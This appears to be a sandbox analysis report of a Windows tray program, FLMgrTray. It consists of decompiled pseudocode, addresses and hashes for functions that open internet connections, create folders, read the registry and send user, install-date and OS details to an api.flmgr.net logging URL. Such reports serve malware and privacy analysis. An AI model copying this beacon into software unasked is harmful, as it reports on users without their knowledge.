                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$CreateOpenmemmove
                                                                                        • String ID:
                                                                                        • API String ID: 1905971084-0
                                                                                        • Opcode ID: 85fe45a72242c58f51f1f5065e60795f26c96a83feaebfcb321f4b2170fddeca
                                                                                        • Instruction ID: 6387c79529556a1a47b03c2bc1a7cf5202e3687e03ba83f5e32724e2ec1f4a06
                                                                                        • Opcode Fuzzy Hash: 85fe45a72242c58f51f1f5065e60795f26c96a83feaebfcb321f4b2170fddeca
                                                                                        • Instruction Fuzzy Hash: 5391A171A00208DFDB29EFA4CC89BEEB7B5EF58310F24451DE401A7691E775AA85CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 38%
                                                                                        			E00185F50(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, char* _a4, signed short _a8, char* _a12, char* _a16, intOrPtr _a20, char* _a24) {
                                                                                        				long _v8;
                                                                                        				char _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				char _v21;
                                                                                        				intOrPtr _v28;
                                                                                        				char* _v32;
                                                                                        				char* _v36;
                                                                                        				char* _v40;
                                                                                        				void* _v84;
                                                                                        				signed int _t38;
                                                                                        				void* _t41;
                                                                                        				intOrPtr _t46;
                                                                                        				short _t47;
                                                                                        				void* _t48;
                                                                                        				void* _t49;
                                                                                        				void* _t62;
                                                                                        				void* _t63;
                                                                                        				void* _t65;
                                                                                        				char* _t68;
                                                                                        				void* _t71;
                                                                                        				signed short _t80;
                                                                                        				intOrPtr _t83;
                                                                                        				void* _t87;
                                                                                        
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018E860);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t38 =  *0x19d05c; // 0x2c80d730
                                                                                        				_push(_t38 ^ _t85);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_v20 = _t87 - 0x1c;
                                                                                        				_t83 = __ecx;
                                                                                        				_v28 = __ecx;
                                                                                        				_v21 = 1;
                                                                                        				_v8 = 0;
                                                                                        				_t41 = InternetOpenA(_a24, 0, 0, 0, 0); // executed
                                                                                        				_t71 = _t41;
                                                                                        				 *(__ecx + 4) = _t71;
                                                                                        				if(_t71 == 0 || _t71 == 0xffffffff) {
                                                                                        					L34:
                                                                                        					_push(0x199fac);
                                                                                        					_v40 = "open internet failed...";
                                                                                        					_push( &_v40);
                                                                                        					L0018C89A();
                                                                                        					asm("int3");
                                                                                        					asm("int3");
                                                                                        					asm("int3");
                                                                                        					asm("int3");
                                                                                        					return HeapFree(GetProcessHeap(), 0, _v84);
                                                                                        				} else {
                                                                                        					_t80 = _a8;
                                                                                        					_t46 = _a20;
                                                                                        					if(_t46 == 0) {
                                                                                        						_t47 = _t80 & 0x0000ffff;
                                                                                        						if(_t80 == 0) {
                                                                                        							_t47 = 0x15;
                                                                                        						}
                                                                                        						_push(0);
                                                                                        						_push(0x8000000);
                                                                                        						_push(1);
                                                                                        						goto L15;
                                                                                        					} else {
                                                                                        						_t65 = _t46 - 1;
                                                                                        						if(_t65 == 0) {
                                                                                        							_t47 = _t80 & 0x0000ffff;
                                                                                        							if(_t80 == 0) {
                                                                                        								_t47 = 0x50;
                                                                                        							}
                                                                                        							_push(0);
                                                                                        							_push(0);
                                                                                        							_push(3);
                                                                                        							goto L15;
                                                                                        						} else {
                                                                                        							if(_t65 != 1) {
                                                                                        								_t68 = _a16;
                                                                                        							} else {
                                                                                        								_t47 = _t80 & 0x0000ffff;
                                                                                        								if(_t80 == 0) {
                                                                                        									_t47 = 0x1bb;
                                                                                        								}
                                                                                        								_push(0);
                                                                                        								_push(0);
                                                                                        								_push(3);
                                                                                        								L15:
                                                                                        								_t68 = _a16;
                                                                                        								_t48 = InternetConnectA(_t71, _a4, _t47, _a12, _t68, ??, ??, ??); // executed
                                                                                        								 *(_t83 + 8) = _t48;
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        					_t49 =  *(_t83 + 8);
                                                                                        					if(_t49 == 0 || _t49 == 0xffffffff) {
                                                                                        						L33:
                                                                                        						_push(0x199fac);
                                                                                        						_v36 = "connect failed...";
                                                                                        						_push( &_v36);
                                                                                        						L0018C89A();
                                                                                        						goto L34;
                                                                                        					} else {
                                                                                        						if(InternetAttemptConnect(0) != 0) {
                                                                                        							_push(0x199fac);
                                                                                        							_v32 = "connect failed...";
                                                                                        							_push( &_v32);
                                                                                        							L0018C89A();
                                                                                        							goto L33;
                                                                                        						} else {
                                                                                        							E00185A60(_t83 + 0x10, _a4);
                                                                                        							if(_t80 != 0) {
                                                                                        								 *(_t83 + 0x70) = _t80;
                                                                                        							} else {
                                                                                        								_t62 = _a20 - _t80;
                                                                                        								if(_t62 == 0) {
                                                                                        									 *(_t83 + 0x70) = 0x15;
                                                                                        								} else {
                                                                                        									_t63 = _t62 - 1;
                                                                                        									if(_t63 == 0) {
                                                                                        										 *(_t83 + 0x70) = 0x50;
                                                                                        									} else {
                                                                                        										if(_t63 == 1) {
                                                                                        											 *(_t83 + 0x70) = 0x1bb;
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        							}
                                                                                        							 *((intOrPtr*)(_t83 + 0x74)) = _a20;
                                                                                        							_t55 = _a12;
                                                                                        							if(_a12 != 0) {
                                                                                        								E00185A60(_t83 + 0x28, _t55);
                                                                                        							}
                                                                                        							if(_t68 != 0) {
                                                                                        								E00185A60(_t83 + 0x40, _t68);
                                                                                        							}
                                                                                        							E001862E0(_t83);
                                                                                        							E00186400(_t83);
                                                                                        							 *[fs:0x0] = _v16;
                                                                                        							return _v21;
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        			}


























                                                                                        0x00185f53
                                                                                        0x00185f55
                                                                                        0x00185f60
                                                                                        0x00185f67
                                                                                        0x00185f6e
                                                                                        0x00185f72
                                                                                        0x00185f78
                                                                                        0x00185f7b
                                                                                        0x00185f7d
                                                                                        0x00185f8b
                                                                                        0x00185f8f
                                                                                        0x00185f96
                                                                                        0x00185f9c
                                                                                        0x00185f9e
                                                                                        0x00185fa3
                                                                                        0x00186147
                                                                                        0x00186147
                                                                                        0x0018614f
                                                                                        0x00186156
                                                                                        0x00186157
                                                                                        0x0018615c
                                                                                        0x0018615d
                                                                                        0x0018615e
                                                                                        0x0018615f
                                                                                        0x00186176
                                                                                        0x00185fb2
                                                                                        0x00185fb5
                                                                                        0x00185fb8
                                                                                        0x00185fbb
                                                                                        0x00185ff4
                                                                                        0x00185ff9
                                                                                        0x00185ffb
                                                                                        0x00185ffb
                                                                                        0x00186000
                                                                                        0x00186002
                                                                                        0x00186007
                                                                                        0x00000000
                                                                                        0x00185fbd
                                                                                        0x00185fbd
                                                                                        0x00185fc0
                                                                                        0x00185fe0
                                                                                        0x00185fe5
                                                                                        0x00185fe7
                                                                                        0x00185fe7
                                                                                        0x00185fec
                                                                                        0x00185fee
                                                                                        0x00185ff0
                                                                                        0x00000000
                                                                                        0x00185fc2
                                                                                        0x00185fc5
                                                                                        0x00185fdb
                                                                                        0x00185fc7
                                                                                        0x00185fc7
                                                                                        0x00185fcc
                                                                                        0x00185fce
                                                                                        0x00185fce
                                                                                        0x00185fd3
                                                                                        0x00185fd5
                                                                                        0x00185fd7
                                                                                        0x00186009
                                                                                        0x00186009
                                                                                        0x00186015
                                                                                        0x0018601b
                                                                                        0x0018601b
                                                                                        0x00185fc5
                                                                                        0x00185fc0
                                                                                        0x0018601e
                                                                                        0x00186023
                                                                                        0x00186132
                                                                                        0x00186132
                                                                                        0x0018613a
                                                                                        0x00186141
                                                                                        0x00186142
                                                                                        0x00000000
                                                                                        0x00186032
                                                                                        0x0018603c
                                                                                        0x0018611d
                                                                                        0x00186125
                                                                                        0x0018612c
                                                                                        0x0018612d
                                                                                        0x00000000
                                                                                        0x00186042
                                                                                        0x00186048
                                                                                        0x0018604f
                                                                                        0x0018607d
                                                                                        0x00186051
                                                                                        0x00186054
                                                                                        0x00186056
                                                                                        0x00186074
                                                                                        0x00186058
                                                                                        0x00186058
                                                                                        0x0018605b
                                                                                        0x0018606b
                                                                                        0x0018605d
                                                                                        0x00186060
                                                                                        0x00186062
                                                                                        0x00186062
                                                                                        0x00186060
                                                                                        0x0018605b
                                                                                        0x00186056
                                                                                        0x00186083
                                                                                        0x00186086
                                                                                        0x0018608b
                                                                                        0x00186091
                                                                                        0x00186091
                                                                                        0x00186098
                                                                                        0x0018609e
                                                                                        0x0018609e
                                                                                        0x001860a5
                                                                                        0x001860ac
                                                                                        0x001860b7
                                                                                        0x001860c5
                                                                                        0x001860c5
                                                                                        0x0018603c
                                                                                        0x00186023

                                                                                        APIs
                                                                                        • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 00185F96
                                                                                        • InternetConnectA.WININET(00000000,?,?,?,?,00000001,08000000,00000000), ref: 00186015
                                                                                        • InternetAttemptConnect.WININET(00000000), ref: 00186034
                                                                                        • _CxxThrowException.VCRUNTIME140(?,00199FAC), ref: 00186157
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$Connect$AttemptExceptionOpenThrow
                                                                                        • String ID:
                                                                                        • API String ID: 894186464-0
                                                                                        • Opcode ID: 3cd8e8d3dd0f68224f43d7b180f1abec223d8790e5f48ed3837cb27298a5dcc2
                                                                                        • Instruction ID: d12329438d136d3d06e477772d84421b534bba407a8f7dcf7a4cb20e6b08aabd
                                                                                        • Opcode Fuzzy Hash: 3cd8e8d3dd0f68224f43d7b180f1abec223d8790e5f48ed3837cb27298a5dcc2
                                                                                        • Instruction Fuzzy Hash: 9851F771640B099BDB24EF64CD45FAA7BE4FB14750F200219F912A76C1D775EB008FA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 87%
                                                                                        			E00184C20(WCHAR* _a4) {
                                                                                        				signed int _v8;
                                                                                        				short _v528;
                                                                                        				void* __ebp;
                                                                                        				signed int _t17;
                                                                                        				int _t19;
                                                                                        				int _t26;
                                                                                        				signed int _t32;
                                                                                        				signed int _t36;
                                                                                        				WCHAR* _t43;
                                                                                        				signed int _t44;
                                                                                        
                                                                                        				_t17 =  *0x19d05c; // 0x2c80d730
                                                                                        				_v8 = _t17 ^ _t44;
                                                                                        				_t43 = _a4;
                                                                                        				_t19 = PathIsDirectoryW(_t43); // executed
                                                                                        				if(_t19 == 0) {
                                                                                        					__imp__wcscpy_s( &_v528, 0x104, _t43);
                                                                                        					_t36 = lstrlenW( &_v528);
                                                                                        					if(_t36 > 0) {
                                                                                        						_t32 =  *(_t44 + _t36 * 2 - 0x20e) & 0x0000ffff;
                                                                                        						if(_t32 == 0x5c || _t32 == 0x2f) {
                                                                                        							 *(_t44 + _t36 * 2 - 0x20e) = 0;
                                                                                        						}
                                                                                        					}
                                                                                        					if(PathRemoveFileSpecW( &_v528) != 0) {
                                                                                        						_t26 = PathIsDirectoryW( &_v528); // executed
                                                                                        						if(_t26 == 0) {
                                                                                        							E00184C20( &_v528);
                                                                                        						}
                                                                                        						CreateDirectoryW(_t43, 0); // executed
                                                                                        						return E001755F4(_v8 ^ _t44);
                                                                                        					} else {
                                                                                        						return E001755F4(_v8 ^ _t44);
                                                                                        					}
                                                                                        				} else {
                                                                                        					return E001755F4(_v8 ^ _t44);
                                                                                        				}
                                                                                        			}













                                                                                        0x00184c29
                                                                                        0x00184c30
                                                                                        0x00184c34
                                                                                        0x00184c38
                                                                                        0x00184c40
                                                                                        0x00184c63
                                                                                        0x00184c79
                                                                                        0x00184c7d
                                                                                        0x00184c7f
                                                                                        0x00184c8a
                                                                                        0x00184c93
                                                                                        0x00184c93
                                                                                        0x00184c8a
                                                                                        0x00184caa
                                                                                        0x00184cc2
                                                                                        0x00184cca
                                                                                        0x00184cd3
                                                                                        0x00184cd8
                                                                                        0x00184cde
                                                                                        0x00184cf2
                                                                                        0x00184cad
                                                                                        0x00184cba
                                                                                        0x00184cba
                                                                                        0x00184c42
                                                                                        0x00184c55
                                                                                        0x00184c55

                                                                                        APIs
                                                                                        • PathIsDirectoryW.SHLWAPI(?), ref: 00184C38
                                                                                        • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,?), ref: 00184C63
                                                                                        • lstrlenW.KERNEL32(?), ref: 00184C73
                                                                                        • PathRemoveFileSpecW.SHLWAPI(?), ref: 00184CA2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$DirectoryFileRemoveSpeclstrlenwcscpy_s
                                                                                        • String ID:
                                                                                        • API String ID: 416736835-0
                                                                                        • Opcode ID: 83e7eefb5edff1ffb28cb37649e4e5a7542b067cfc6d8eee2b4217a204899ec8
                                                                                        • Instruction ID: 37246f69d24ab4f5485ec1b4d9ff283ee806fa274ae3ed98772d22cc97c2d19d
                                                                                        • Opcode Fuzzy Hash: 83e7eefb5edff1ffb28cb37649e4e5a7542b067cfc6d8eee2b4217a204899ec8
                                                                                        • Instruction Fuzzy Hash: 17216075A01219A7CF10EFA4EC49AAD77ACAF58701F1041AAFC0AD6141EB30DB91CB95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 45%
                                                                                        			E00173510(intOrPtr* __ecx, char _a4, signed int _a24, intOrPtr _a28) {
                                                                                        				char _v8;
                                                                                        				char _v16;
                                                                                        				signed int _v20;
                                                                                        				signed int _v24;
                                                                                        				intOrPtr _v28;
                                                                                        				short _v44;
                                                                                        				intOrPtr _v48;
                                                                                        				char _v68;
                                                                                        				intOrPtr* _v72;
                                                                                        				intOrPtr* _v76;
                                                                                        				intOrPtr _v80;
                                                                                        				intOrPtr _v84;
                                                                                        				void* __ebx;
                                                                                        				void* __ebp;
                                                                                        				signed int _t55;
                                                                                        				signed int _t56;
                                                                                        				intOrPtr* _t59;
                                                                                        				intOrPtr _t60;
                                                                                        				intOrPtr _t69;
                                                                                        				intOrPtr _t72;
                                                                                        				intOrPtr _t75;
                                                                                        				intOrPtr* _t81;
                                                                                        				intOrPtr* _t83;
                                                                                        				intOrPtr _t89;
                                                                                        				short _t90;
                                                                                        				intOrPtr _t91;
                                                                                        				intOrPtr* _t94;
                                                                                        				intOrPtr _t95;
                                                                                        				signed int _t96;
                                                                                        				signed int _t97;
                                                                                        				void* _t98;
                                                                                        				void* _t99;
                                                                                        				void* _t100;
                                                                                        				intOrPtr* _t102;
                                                                                        				intOrPtr* _t105;
                                                                                        				signed int _t107;
                                                                                        				void* _t108;
                                                                                        				void* _t109;
                                                                                        				void* _t110;
                                                                                        				void* _t111;
                                                                                        
                                                                                        				_t83 = __ecx;
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018D960);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t109 = _t108 - 0x44;
                                                                                        				_t55 =  *0x19d05c; // 0x2c80d730
                                                                                        				_t56 = _t55 ^ _t107;
                                                                                        				_v20 = _t56;
                                                                                        				_push(_t56);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_v84 = _a28;
                                                                                        				_t6 = _t83 + 0x94; // 0x13c1cd4
                                                                                        				_t59 = _t6;
                                                                                        				_v8 = 0;
                                                                                        				_v72 = _t59;
                                                                                        				if( *((intOrPtr*)(__ecx + 0xa8)) >= 8) {
                                                                                        					_v72 =  *_t59;
                                                                                        				}
                                                                                        				_t12 = _t83 + 0x78; // 0x13c1cb8
                                                                                        				_t102 = _t12;
                                                                                        				_t93 =  >=  ? _a4 :  &_a4;
                                                                                        				_v80 =  >=  ? _a4 :  &_a4;
                                                                                        				if( *((intOrPtr*)(_t102 + 0x14)) >= 8) {
                                                                                        					_t102 =  *_t102;
                                                                                        				}
                                                                                        				_t17 = _t83 + 0x30; // 0x13c1c70
                                                                                        				_t94 = _t17;
                                                                                        				if( *((intOrPtr*)(_t83 + 0x44)) >= 8) {
                                                                                        					_t94 =  *_t94;
                                                                                        				}
                                                                                        				_t19 = _t83 + 0x18; // 0x13c1c58
                                                                                        				_t105 = _t19;
                                                                                        				if( *((intOrPtr*)(_t83 + 0x2c)) >= 8) {
                                                                                        					_t105 =  *_t105;
                                                                                        				}
                                                                                        				_t21 = _t83 + 0x48; // 0x13c1c88
                                                                                        				_t81 = _t21;
                                                                                        				if( *((intOrPtr*)(_t83 + 0x5c)) >= 8) {
                                                                                        					_t81 =  *_t81;
                                                                                        				}
                                                                                        				_t119 =  *((intOrPtr*)(_t83 + 0x14)) - 8;
                                                                                        				_t60 = _v72;
                                                                                        				_v76 = _t83;
                                                                                        				if( *((intOrPtr*)(_t83 + 0x14)) >= 8) {
                                                                                        					_v76 =  *_t83;
                                                                                        					_t60 = _v72;
                                                                                        				}
                                                                                        				_push( *0x19dbd4);
                                                                                        				_push( *0x19dbd0);
                                                                                        				_push( *((intOrPtr*)(_t83 + 0xc4)));
                                                                                        				_push(_t60);
                                                                                        				_push( *((intOrPtr*)(_t83 + 0x90)));
                                                                                        				_push(_v84);
                                                                                        				E00175480(_t94, _t119,  &_v44, L"http://api.flmgr.net/log/client/run?User=%s&InstallDate=%s&ChannelCode=%s&Ver=%s&StartMode=%d&OsVer=%s&Action=%s&step=%d&Intact=%d&Miss=%s&RunMode=%d&UserEv=%d&Sdsoft=%d", _v76);
                                                                                        				_t110 = _t109 + 0x24;
                                                                                        				_v8 = 1;
                                                                                        				E0016C3D0(_t110,  &_v44);
                                                                                        				E00183C60(_t81, _t119,  &_v68, _t81, _t105, _t94,  *0x19db94, _t102, _v80); // executed
                                                                                        				_t95 = _v48;
                                                                                        				_t111 = _t110 + 0x1c;
                                                                                        				if(_t95 >= 0x10) {
                                                                                        					_t91 = _v68;
                                                                                        					_t100 = _t95 + 1;
                                                                                        					_t75 = _t91;
                                                                                        					if(_t100 >= 0x1000) {
                                                                                        						_t91 =  *((intOrPtr*)(_t91 - 4));
                                                                                        						_t100 = _t100 + 0x23;
                                                                                        						if(_t75 > 0x1f) {
                                                                                        							__imp___invalid_parameter_noinfo_noreturn();
                                                                                        						}
                                                                                        					}
                                                                                        					_push(_t100);
                                                                                        					E00175733(_t75, _t91);
                                                                                        					_t111 = _t111 + 8;
                                                                                        				}
                                                                                        				_t96 = _v24;
                                                                                        				if(_t96 >= 8) {
                                                                                        					_t90 = _v44;
                                                                                        					_t99 = 2 + _t96 * 2;
                                                                                        					_t72 = _t90;
                                                                                        					if(_t99 >= 0x1000) {
                                                                                        						_t90 =  *((intOrPtr*)(_t90 - 4));
                                                                                        						_t99 = _t99 + 0x23;
                                                                                        						if(_t72 > 0x1f) {
                                                                                        							__imp___invalid_parameter_noinfo_noreturn();
                                                                                        						}
                                                                                        					}
                                                                                        					_push(_t99);
                                                                                        					E00175733(_t72, _t90);
                                                                                        					_t111 = _t111 + 8;
                                                                                        				}
                                                                                        				_t97 = _a24;
                                                                                        				_v28 = 0;
                                                                                        				_v24 = 7;
                                                                                        				_v44 = 0;
                                                                                        				if(_t97 >= 8) {
                                                                                        					_t89 = _a4;
                                                                                        					_t98 = 2 + _t97 * 2;
                                                                                        					_t69 = _t89;
                                                                                        					if(_t98 >= 0x1000) {
                                                                                        						_t89 =  *((intOrPtr*)(_t89 - 4));
                                                                                        						_t98 = _t98 + 0x23;
                                                                                        						if(_t69 > 0x1f) {
                                                                                        							__imp___invalid_parameter_noinfo_noreturn();
                                                                                        						}
                                                                                        					}
                                                                                        					_push(_t98);
                                                                                        					E00175733(_t69, _t89);
                                                                                        				}
                                                                                        				 *[fs:0x0] = _v16;
                                                                                        				return E001755F4(_v20 ^ _t107);
                                                                                        			}











































                                                                                        0x00173510
                                                                                        0x00173513
                                                                                        0x00173515
                                                                                        0x00173520
                                                                                        0x00173521
                                                                                        0x00173524
                                                                                        0x00173529
                                                                                        0x0017352b
                                                                                        0x00173531
                                                                                        0x00173535
                                                                                        0x0017353e
                                                                                        0x00173548
                                                                                        0x00173548
                                                                                        0x0017354e
                                                                                        0x00173555
                                                                                        0x00173558
                                                                                        0x0017355c
                                                                                        0x0017355c
                                                                                        0x00173566
                                                                                        0x00173566
                                                                                        0x00173569
                                                                                        0x00173571
                                                                                        0x00173574
                                                                                        0x00173576
                                                                                        0x00173576
                                                                                        0x0017357c
                                                                                        0x0017357c
                                                                                        0x0017357f
                                                                                        0x00173581
                                                                                        0x00173581
                                                                                        0x00173587
                                                                                        0x00173587
                                                                                        0x0017358a
                                                                                        0x0017358c
                                                                                        0x0017358c
                                                                                        0x00173592
                                                                                        0x00173592
                                                                                        0x00173595
                                                                                        0x00173597
                                                                                        0x00173597
                                                                                        0x00173599
                                                                                        0x0017359d
                                                                                        0x001735a0
                                                                                        0x001735a3
                                                                                        0x001735a7
                                                                                        0x001735aa
                                                                                        0x001735aa
                                                                                        0x001735ad
                                                                                        0x001735b3
                                                                                        0x001735b9
                                                                                        0x001735bf
                                                                                        0x001735c0
                                                                                        0x001735c9
                                                                                        0x001735e2
                                                                                        0x001735e7
                                                                                        0x001735ea
                                                                                        0x001735f4
                                                                                        0x001735fd
                                                                                        0x00173602
                                                                                        0x00173605
                                                                                        0x0017360b
                                                                                        0x0017360d
                                                                                        0x00173610
                                                                                        0x00173611
                                                                                        0x00173619
                                                                                        0x0017361b
                                                                                        0x0017361e
                                                                                        0x00173629
                                                                                        0x0017362b
                                                                                        0x0017362b
                                                                                        0x00173629
                                                                                        0x00173631
                                                                                        0x00173633
                                                                                        0x00173638
                                                                                        0x00173638
                                                                                        0x0017363b
                                                                                        0x00173641
                                                                                        0x00173643
                                                                                        0x00173646
                                                                                        0x0017364d
                                                                                        0x00173655
                                                                                        0x00173657
                                                                                        0x0017365a
                                                                                        0x00173665
                                                                                        0x00173667
                                                                                        0x00173667
                                                                                        0x00173665
                                                                                        0x0017366d
                                                                                        0x0017366f
                                                                                        0x00173674
                                                                                        0x00173674
                                                                                        0x00173677
                                                                                        0x0017367c
                                                                                        0x00173683
                                                                                        0x0017368a
                                                                                        0x00173691
                                                                                        0x00173693
                                                                                        0x00173696
                                                                                        0x0017369d
                                                                                        0x001736a5
                                                                                        0x001736a7
                                                                                        0x001736aa
                                                                                        0x001736b5
                                                                                        0x001736b7
                                                                                        0x001736b7
                                                                                        0x001736b5
                                                                                        0x001736bd
                                                                                        0x001736bf
                                                                                        0x001736c4
                                                                                        0x001736ca
                                                                                        0x001736e2

                                                                                        APIs
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,2C80D730,?,6C193C6C), ref: 0017362B
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,2C80D730,?,6C193C6C), ref: 00173667
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,2C80D730,?,6C193C6C), ref: 001736B7
                                                                                        Strings
                                                                                        • http://api.flmgr.net/log/client/run?User=%s&InstallDate=%s&ChannelCode=%s&Ver=%s&StartMode=%d&OsVer=%s&Action=%s&step=%d&Intact=%d, xrefs: 001735DC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                        • String ID: http://api.flmgr.net/log/client/run?User=%s&InstallDate=%s&ChannelCode=%s&Ver=%s&StartMode=%d&OsVer=%s&Action=%s&step=%d&Intact=%d
                                                                                        • API String ID: 3668304517-3480249319
                                                                                        • Opcode ID: c851a9e52e7a286649eb3650ceb05508613e0e7c5ab7dde9105b091bc169e78d
                                                                                        • Instruction ID: 3c7d72b161bdca060e2f5eac4806149491b98bc2bc65993310c466e9bf81af7e
                                                                                        • Opcode Fuzzy Hash: c851a9e52e7a286649eb3650ceb05508613e0e7c5ab7dde9105b091bc169e78d
                                                                                        • Instruction Fuzzy Hash: FE51B371A00108EFCF04DF54DC85A9DBB76FF48319F60812DE5189B251D732AA96DFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 72%
                                                                                        			E00183280(void** __ecx, short* _a4, short* _a8) {
                                                                                        				int _v8;
                                                                                        				char _v16;
                                                                                        				char _v20;
                                                                                        				int _v24;
                                                                                        				int _v28;
                                                                                        				void** _v32;
                                                                                        				int _v36;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				signed int _t23;
                                                                                        				long _t29;
                                                                                        				intOrPtr _t35;
                                                                                        				void _t36;
                                                                                        				void** _t39;
                                                                                        				int _t41;
                                                                                        				void* _t46;
                                                                                        				void* _t50;
                                                                                        				void* _t53;
                                                                                        				short* _t55;
                                                                                        				signed int _t57;
                                                                                        
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018E479);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t23 =  *0x19d05c; // 0x2c80d730
                                                                                        				_push(_t23 ^ _t57);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t39 = __ecx;
                                                                                        				_v32 = __ecx;
                                                                                        				_v24 = 0;
                                                                                        				_t55 = _a4;
                                                                                        				 *(_t55 + 0x10) = 0;
                                                                                        				 *((intOrPtr*)(_t55 + 0x14)) = 7;
                                                                                        				 *_t55 = 0;
                                                                                        				_v8 = 0;
                                                                                        				asm("xorps xmm0, xmm0");
                                                                                        				_v20 = 0;
                                                                                        				_v28 = 0;
                                                                                        				_v24 = 1;
                                                                                        				asm("movlpd [ebp-0x24], xmm0");
                                                                                        				_t29 = RegQueryValueExW( *__ecx, _a8, 0,  &_v28, 0,  &_v36); // executed
                                                                                        				 *(_t39 + 0x2c) = _t29;
                                                                                        				if(_t29 == 0) {
                                                                                        					_t41 = _v36;
                                                                                        					if(_t41 > 0) {
                                                                                        						_t53 = malloc(_t41);
                                                                                        						memset(_t53, 0, _t41);
                                                                                        						E001827F0(_v32, _a8, _t53, _t41,  &_v20); // executed
                                                                                        						_t35 = _v20;
                                                                                        						if(_t35 == 1 || _t35 == 2 || _t35 == 3) {
                                                                                        							_t46 = _t53;
                                                                                        							_t20 = _t46 + 2; // 0x2
                                                                                        							_t50 = _t20;
                                                                                        							do {
                                                                                        								_t36 =  *_t46;
                                                                                        								_t46 = _t46 + 2;
                                                                                        							} while (_t36 != 0);
                                                                                        							_push(_t46 - _t50 >> 1);
                                                                                        							E00163540(_t41, _t50, _t53, _t53);
                                                                                        						}
                                                                                        						free(_t53);
                                                                                        					}
                                                                                        				}
                                                                                        				 *[fs:0x0] = _v16;
                                                                                        				return _t55;
                                                                                        			}























                                                                                        0x00183283
                                                                                        0x00183285
                                                                                        0x00183290
                                                                                        0x00183297
                                                                                        0x0018329e
                                                                                        0x001832a2
                                                                                        0x001832a8
                                                                                        0x001832aa
                                                                                        0x001832ad
                                                                                        0x001832b6
                                                                                        0x001832b9
                                                                                        0x001832c0
                                                                                        0x001832c7
                                                                                        0x001832ca
                                                                                        0x001832cd
                                                                                        0x001832d0
                                                                                        0x001832d3
                                                                                        0x001832df
                                                                                        0x001832ec
                                                                                        0x001832f3
                                                                                        0x001832f9
                                                                                        0x001832fe
                                                                                        0x00183300
                                                                                        0x00183305
                                                                                        0x0018330f
                                                                                        0x00183314
                                                                                        0x00183328
                                                                                        0x0018332d
                                                                                        0x00183333
                                                                                        0x0018333f
                                                                                        0x00183341
                                                                                        0x00183341
                                                                                        0x00183344
                                                                                        0x00183344
                                                                                        0x00183347
                                                                                        0x0018334a
